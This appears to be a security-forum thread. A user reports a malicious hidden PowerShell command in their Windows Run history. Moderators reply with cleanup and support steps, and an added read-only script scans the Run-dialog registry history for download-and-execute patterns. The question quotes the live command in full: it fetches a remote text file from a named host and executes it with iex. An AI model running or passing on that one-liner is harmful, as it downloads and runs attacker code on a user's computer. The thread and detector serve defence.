Found a weird command in Run program

Izam
Izam Student

I just got out of bed and accidentally opened the Windows + R command; this is what I found:

COMMAND:

powershell.exe -W Hidden -command $url = 'https://finalsteptogo.com/uploads/tr14.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text

The link leads to this and another link leads to a RAR file.

I was thinking if there's a way to resolve this problem. I currently have many important files saved.

Answers

  • Flexx
    Flexx mod
    edited September 28

    That command is potentially malicious and can be used to download and execute a script from a remote URL without the user's knowledge. It is crucial to be very cautious with such commands. Try these steps:

    1. Open the Run dialog and execute the following commands one by one:
      • temp – Delete all the files in the folder.
      • %temp% – Delete all the files in the folder.
      • prefetch – Delete all the files in the folder.
    2. Run a full system scan with Bitdefender.
    3. Since these types of commands may be stored on your PC, use either CCleaner or BleachBit to remove recent command history.
    4. For the downloaded RAR file, upload it to VirusTotal.com and scan it.
    5. To ensure that the malicious command has also been removed from your registry, kindly use Malwarebytes (https://www.malwarebytes.com/) and perform a full system scan.

    Regards
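
The Run dialog keeps its history in the current user's registry hive, which is what the command-history and registry cleanup steps above target. The following PowerShell is an added example, not part of any post in this thread: it lists the RunMRU entries and flags download-and-execute one-liners without running, fetching or deleting anything. The sample command is constructed (modeled on the one in the question, with a placeholder URL), and the function names and indicator list are assumptions.

```powershell
# Added example: read-only triage of Run-dialog history.
# Explorer stores Run-dialog entries under this per-user key as values a, b, c ...
$RunMruKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'

# Indicators seen in the command quoted in the question; alias names are additions.
$Indicators = [ordered]@{
    'hidden window'     = '(?i)-w\w*\s+hid'
    'web download'      = '(?i)\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString)\b'
    'in-memory execute' = '(?i)\b(iex|Invoke-Expression)\b'
}

function Test-RunCommand {
    param([string]$CommandLine)
    $hits = @($Indicators.Keys | Where-Object { $CommandLine -match $Indicators[$_] })
    $urls = @([regex]::Matches($CommandLine, 'https?://[^\s''";)]+') |
              ForEach-Object { $_.Value })
    [pscustomobject]@{
        Suspicious = ($hits.Count -ge 2)   # two or more indicators together
        Indicators = $hits -join ', '
        Urls       = $urls -join ' '
        Command    = $CommandLine
    }
}

function Get-RunMruEntry {
    if (-not (Test-Path $RunMruKey)) { return }
    foreach ($p in (Get-ItemProperty -Path $RunMruKey).PSObject.Properties) {
        # Single-letter values hold the commands, each suffixed with "\1";
        # the MRUList value only records their order.
        if ($p.Name -match '^[a-z]$') { $p.Value -replace '\\1$', '' }
    }
}

# Constructed sample, kept as inert text inside a here-string (never executed).
$sample = @'
powershell.exe -W Hidden -command $url = 'https://example.invalid/payload.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
'@

# Check the sample plus whatever is stored for the current user.
@($sample) + @(Get-RunMruEntry) |
    ForEach-Object { Test-RunCommand $_ } |
    Where-Object Suspicious |
    Format-List Indicators, Urls, Command
```

Run it in a normal PowerShell session as the affected user, since the key is per-user. An entry that is flagged is worth recording (screenshot or export) before any cleanup tool removes it, so it can be passed on to support.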

  • Gjoksi
    Gjoksi Defender of the month mod

    Hello.

    I believe that this is a job for the antimalware team at Bitdefender.

    But, first scan (and disinfect, if needed) your PC with Bitdefender Rescue Environment:
    https://www.bitdefender.com/consumer/support/answer/29132/

    Restart your PC.

    Next, do the following steps:
    Take screenshot(s) of the issue,
    create a log file on your Windows device using Bitdefender Support Tool, by following these steps:
    https://www.bitdefender.com/consumer/support/answer/1733/

    and
    create a log file on your Windows device using BDsysLog, by following these steps:

    https://www.bitdefender.com/consumer/support/answer/1922/

    Next, contact Bitdefender Consumer Support by e-mail:

    https://www.bitdefender.com/consumer/support/help/

    with a short description of the issue.
    After that, you will get an automated reply by the Bitdefender Customer Care Team, with your ticket number.
    Now, in reply to that automated reply, you can send the screenshot(s) you already took and the log files you already created in the first step.
    Since you are all done, just wait for the support engineers to investigate your issue and find a solution to fix the issue.
    Remember that the screenshot(s) and the log files will help the support engineers a lot in investigating your issue better and faster and in finding a solution.
    NOTE: If any of the log files is larger than 25MB, you can upload the log file here:

    https://upload.bitdefender.net/

    After the upload is done, you will get a notification with the file's URL and then you can share the file's URL with the Bitdefender Consumer Support.
    Regards.